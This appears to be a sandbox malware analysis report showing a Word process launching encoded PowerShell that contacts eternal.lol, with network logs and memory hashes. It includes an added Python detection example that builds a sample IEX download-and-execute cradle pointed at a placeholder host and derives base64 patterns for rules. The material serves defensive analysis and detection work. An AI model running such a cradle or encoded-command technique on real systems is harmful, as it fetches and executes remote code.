                                                        Data ASCII:. ! ` . . . . . . . . . . . . . . . . . . . . . . . . . . A W N . 2 4 . 5 . . . . . . . . . . . . . . . . . . . . . . . . . . > . . > . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . .
                                                        Data Raw:ec a5 c1 00 21 60 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 02 08 00 00 0e 00 41 57 4e 00 32 34 2e 35 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 3e c7 00 00 3e c7 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00
Timestamp                          | Source Port | Dest Port | Source IP     | Dest IP
Jan 6, 2025 06:07:13.552695990 CET | 52776       | 53        | 192.168.2.24  | 1.1.1.1
Jan 6, 2025 06:07:13.557485104 CET | 53          | 52776     | 1.1.1.1       | 192.168.2.24
Jan 6, 2025 06:07:13.557599068 CET | 52776       | 53        | 192.168.2.24  | 1.1.1.1
Jan 6, 2025 06:07:13.557647943 CET | 52776       | 53        | 192.168.2.24  | 1.1.1.1
Jan 6, 2025 06:07:13.562411070 CET | 53          | 52776     | 1.1.1.1       | 192.168.2.24
Jan 6, 2025 06:07:14.036477089 CET | 53          | 52776     | 1.1.1.1       | 192.168.2.24
Jan 6, 2025 06:07:14.036823988 CET | 52776       | 53        | 192.168.2.24  | 1.1.1.1
Jan 6, 2025 06:07:14.041780949 CET | 53          | 52776     | 1.1.1.1       | 192.168.2.24
Jan 6, 2025 06:07:14.041920900 CET | 52776       | 53        | 192.168.2.24  | 1.1.1.1
Jan 6, 2025 06:07:16.920353889 CET | 52782       | 443       | 192.168.2.24  | 192.64.119.42
Jan 6, 2025 06:07:16.920391083 CET | 443         | 52782     | 192.64.119.42 | 192.168.2.24
Jan 6, 2025 06:07:16.920536041 CET | 52782       | 443       | 192.168.2.24  | 192.64.119.42
Jan 6, 2025 06:07:16.933629036 CET | 52782       | 443       | 192.168.2.24  | 192.64.119.42
Jan 6, 2025 06:07:16.933645964 CET | 443         | 52782     | 192.64.119.42 | 192.168.2.24
Jan 6, 2025 06:07:59.759612083 CET | 443         | 52782     | 192.64.119.42 | 192.168.2.24
Jan 6, 2025 06:07:59.759762049 CET | 52782       | 443       | 192.168.2.24  | 192.64.119.42
Jan 6, 2025 06:07:59.775595903 CET | 52782       | 443       | 192.168.2.24  | 192.64.119.42
Jan 6, 2025 06:07:59.775609016 CET | 443         | 52782     | 192.64.119.42 | 192.168.2.24
Jan 6, 2025 06:07:59.777343988 CET | 52794       | 443       | 192.168.2.24  | 192.64.119.42
Jan 6, 2025 06:07:59.777380943 CET | 443         | 52794     | 192.64.119.42 | 192.168.2.24
Jan 6, 2025 06:07:59.777455091 CET | 52794       | 443       | 192.168.2.24  | 192.64.119.42
Jan 6, 2025 06:07:59.778399944 CET | 52794       | 443       | 192.168.2.24  | 192.64.119.42
Jan 6, 2025 06:07:59.778420925 CET | 443         | 52794     | 192.64.119.42 | 192.168.2.24
Jan 6, 2025 06:08:42.543309927 CET | 443         | 52794     | 192.64.119.42 | 192.168.2.24
Jan 6, 2025 06:08:42.543428898 CET | 52794       | 443       | 192.168.2.24  | 192.64.119.42
Jan 6, 2025 06:08:42.544135094 CET | 52794       | 443       | 192.168.2.24  | 192.64.119.42
Jan 6, 2025 06:08:42.544161081 CET | 443         | 52794     | 192.64.119.42 | 192.168.2.24
Timestamp                          | Source Port | Dest Port | Source IP     | Dest IP
Jan 6, 2025 06:07:13.552164078 CET | 53          | 51845     | 1.1.1.1       | 192.168.2.24
Jan 6, 2025 06:07:16.903330088 CET | 51845       | 53        | 192.168.2.24  | 1.1.1.1
Jan 6, 2025 06:07:16.913852930 CET | 53          | 51845     | 1.1.1.1       | 192.168.2.24
Timestamp                          | Source IP    | Dest IP | Trans ID | OP Code            | Name        | Type           | Class       | DNS over HTTPS
Jan 6, 2025 06:07:16.903330088 CET | 192.168.2.24 | 1.1.1.1 | 0xe37b   | Standard query (0) | eternal.lol | A (IP address) | IN (0x0001) | false
Timestamp                          | Source IP | Dest IP      | Trans ID | Reply Code   | Name                             | CName                   | Address        | Type                   | Class       | DNS over HTTPS
Jan 6, 2025 06:07:16.118557930 CET | 1.1.1.1   | 192.168.2.24 | 0x8a50   | No error (0) | scdn1cc4b.wpc.9aea3.sigmacdn.net | sni1gl.wpc.sigmacdn.net |                | CNAME (Canonical name) | IN (0x0001) | false
Jan 6, 2025 06:07:16.118557930 CET | 1.1.1.1   | 192.168.2.24 | 0x8a50   | No error (0) | sni1gl.wpc.sigmacdn.net          |                         | 152.199.21.175 | A (IP address)         | IN (0x0001) | false
Jan 6, 2025 06:07:16.913852930 CET | 1.1.1.1   | 192.168.2.24 | 0xe37b   | No error (0) | eternal.lol                      |                         | 192.64.119.42  | A (IP address)         | IN (0x0001) | false

Target ID: 0
Start time: 00:07:09
Start date: 06/01/2025
Path: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Wow64 process (32bit): false
Commandline: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Imagebase: 0x7ff7d8c70000
File size: 1'637'952 bytes
MD5 hash: A9F0EC89897AC6C878D217DFB64CA752
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 4
Start time: 00:07:13
Start date: 06/01/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e 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""
Imagebase: 0x7ff7dbf70000
File size: 450'560 bytes
MD5 hash: 9D8E30DAF21108092D5980C931876B7E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 5
Start time: 00:07:13
Start date: 06/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6038b0000
File size: 1'040'384 bytes
MD5 hash: 9698384842DA735D80D278A427A229AB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true
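Target ID 4 above is powershell.exe started by WINWORD.EXE with -e and a base64 argument that this page does not reproduce. The added example below is not part of the report; it shows the two checks a detection engineer puts on such a command line: decoding the UTF-16LE base64 to read the script, and deriving the alignment-dependent base64 substrings of IEX so that a rule can match them on the raw command line without decoding (a 3-byte base64 group boundary can fall on any of three offsets, so each keyword has three encodings). The sample command line and script are constructed for the example and the host name in it is a placeholder.

```python
import base64
import re


def encode_command(script):
    """Build the -EncodedCommand argument the way an attacker (or an admin) would."""
    return base64.b64encode(script.encode('utf-16-le')).decode()


# Constructed sample standing in for the real encoded command line of Target ID 4,
# which this page does not reproduce. The script and the host name are assumptions.
SAMPLE_SCRIPT = 'IEX (New-Object Net.WebClient).DownloadString("https://example.invalid/stage2")'
SAMPLE_CMDLINE = ('"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -e '
                  + encode_command(SAMPLE_SCRIPT))

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
FLAG_RE = re.compile(r'''(?i)(?:^|\s)-(e[a-z]*)\s+["']?([A-Za-z0-9+/=]+)''')


def b64_variants(word):
    """The base64 substrings that the UTF-16LE encoding of `word` can produce, one per
    3-byte alignment. Characters that also depend on the unknown neighbouring bytes
    are found by encoding with two different fillers and dropping whatever differs."""
    raw = word.encode('utf-16-le')
    variants = []
    for shift in range(3):
        encs = [base64.b64encode(bytes([fill]) * shift + raw + bytes([fill]) * 3).decode()
                for fill in (0x00, 0xFF)]
        # keep only characters that are identical for both fillers (and are not padding)
        common = ''.join(a if a == b and a != '=' else ' ' for a, b in zip(*encs))
        variants.append(max(common.split(), key=len))
    return variants


# What a Sigma-style 'contains' rule for base64-encoded IEX effectively matches on.
IEX_VARIANTS = {w: b64_variants(w) for w in ('IEX', 'iex', 'Iex', 'Invoke-Expression')}


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand (UTF-16LE in base64), or None."""
    for m in FLAG_RE.finditer(cmdline):
        flag, blob = m.group(1).lower(), m.group(2)
        if not 'encodedcommand'.startswith(flag):
            continue                    # -ExecutionPolicy, -ErrorAction, ... are not it
        try:
            return base64.b64decode(blob, validate=True).decode('utf-16-le')
        except (ValueError, UnicodeDecodeError):
            return None
    return None


def scan_cmdline(cmdline):
    """Findings for one process command line: raw-base64 IEX hits plus the decoded script."""
    hits = [(word, v) for word, variants in IEX_VARIANTS.items()
            for v in variants if v in cmdline]
    return {'encoded_iex': hits, 'decoded': decode_encoded_command(cmdline)}


if __name__ == '__main__':
    result = scan_cmdline(SAMPLE_CMDLINE)
    print('encoded IEX variants present:', result['encoded_iex'])
    print('decoded script:', result['decoded'])
```

Matching the raw base64 is cheap and works in log pipelines that never decode, but it only catches the spellings you generated variants for; decoding the argument is what lets you read the download URL and feed it to the network indicators, so both steps belong in the rule set.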

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.12724884332.00007FFCC9510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCC9510000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffcc9510000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4e78a25e1bfc146d7bf638ebdb23718b1b81f54db93f388f619af8a6946047f6
                                                          • Instruction ID: 003f1a3faf71e8e76f31587182c05f885f0fd718ba6b75764d3bc55d8c79e4e8
                                                          • Opcode Fuzzy Hash: 4e78a25e1bfc146d7bf638ebdb23718b1b81f54db93f388f619af8a6946047f6
                                                          • Instruction Fuzzy Hash: 88D1C352E0EAD98FE7A69E7808751B57FF0DF56214B0812FBD08DCB493D9186C06D3A1
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.12724884332.00007FFCC9510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCC9510000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffcc9510000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 502781cf1123e0e32161eaedc047d9d2050719549bbd928af285414b11dbf518
                                                          • Instruction ID: a24f599ea45aa359381aea0bc01b73080bb7f8fba9d6f9f549012c275eec3bb4
                                                          • Opcode Fuzzy Hash: 502781cf1123e0e32161eaedc047d9d2050719549bbd928af285414b11dbf518
                                                          • Instruction Fuzzy Hash: 8B31C562E1EAFE5FF7A5AE7808751786AE0EF55214B4812BFC44DC79C3DD08AC01D2A1
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.12724495947.00007FFCC9440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCC9440000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffcc9440000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 08cb8f305eb77ef8e84aedd152caaa946e99f9d399a4ba58fcd6ea53d4c76114
                                                          • Instruction ID: 6250b56534375371548a6702325e0b92af059f9639c4155b658b6901f614be44
                                                          • Opcode Fuzzy Hash: 08cb8f305eb77ef8e84aedd152caaa946e99f9d399a4ba58fcd6ea53d4c76114
                                                          • Instruction Fuzzy Hash: 4B21C73021CB594FD749EF18D4A16B977E1FF95314F10097DD08AC3992EB26A441C745
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.12724884332.00007FFCC9510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCC9510000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffcc9510000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0796201bc73cd4950e406b18c8962cf250c3dcbc0edf968a7d0141d8745a8fa3
                                                          • Instruction ID: 5435e62c8d8f0f4900d52501c66d561522497dbef9a9b4bda982156cc6de9580
                                                          • Opcode Fuzzy Hash: 0796201bc73cd4950e406b18c8962cf250c3dcbc0edf968a7d0141d8745a8fa3
                                                          • Instruction Fuzzy Hash: 33110472E0D6D94FEB95EE5848A45A8BBB1EF09611B1902FAC40CC7883DB35A804C360
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.12724495947.00007FFCC9440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCC9440000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffcc9440000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: z_^$z_^$z_^$z_^$z_^$z_^
                                                          • API String ID: 0-3801612629
                                                          • Opcode ID: 27337e18a83979f9381293b66635e0ef57756dcb707a0697ded3b3d3e8e3ed3d
                                                          • Instruction ID: e472e2bf0475398dacab4c14cdee09894781440658164e1fb0c068485967b9cc
                                                          • Opcode Fuzzy Hash: 27337e18a83979f9381293b66635e0ef57756dcb707a0697ded3b3d3e8e3ed3d
                                                          • Instruction Fuzzy Hash: 10819593D0EAEB5FF2179E285CA50E97F50EF62254B1E10FAC0C44BC93ED19A806C271
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.12724495947.00007FFCC9440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCC9440000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffcc9440000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: z_^$z_^$z_^$z_^$z_^$z_^
                                                          • API String ID: 0-789656038
                                                          • Opcode ID: 64c4070c7e2e163868426b9ce391ab84d3e49f8ede3696efda44669abaf7f530
                                                          • Instruction ID: bff9b78f426bc3e1315ea2e5a04593b5046b6a2f194fc8cf9c2c2bf9766fa8bb
                                                          • Opcode Fuzzy Hash: 64c4070c7e2e163868426b9ce391ab84d3e49f8ede3696efda44669abaf7f530
                                                          • Instruction Fuzzy Hash: FB41639391E7DB4EE3169E380CB41953FA1EF63214B4E12EBD0D44F4D7AC59A80AC366